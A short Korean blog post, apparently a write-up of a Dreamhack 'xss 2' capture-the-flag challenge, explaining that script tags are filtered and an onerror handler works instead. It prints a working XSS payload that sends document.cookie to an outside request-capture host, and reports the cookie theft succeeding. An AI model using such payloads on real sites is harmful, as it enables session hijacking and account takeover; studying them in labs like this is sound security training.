xss 2

buaii·2023년 7월 6일
0

Web Hacking

목록 보기
7/34
post-custom-banner

xss

xss를 이용하는 문제

이번엔 vuln page에서 알림이 발생하지 않는다
입력값을 필터링 하는 것 같다

<script> 대신 on핸들러를 이용하니 알림이 발생한다
이를 이용하여 payload를 작성해보자

payload

<img src=@ onerror=location.href="https://ddglsfq.request.dreamhack.games/"+document.cookie;></img>

위 코드를 flag페이지에서 제출해보자

쿠키 탈취에 성공했다

profile
buaii
post-custom-banner

0개의 댓글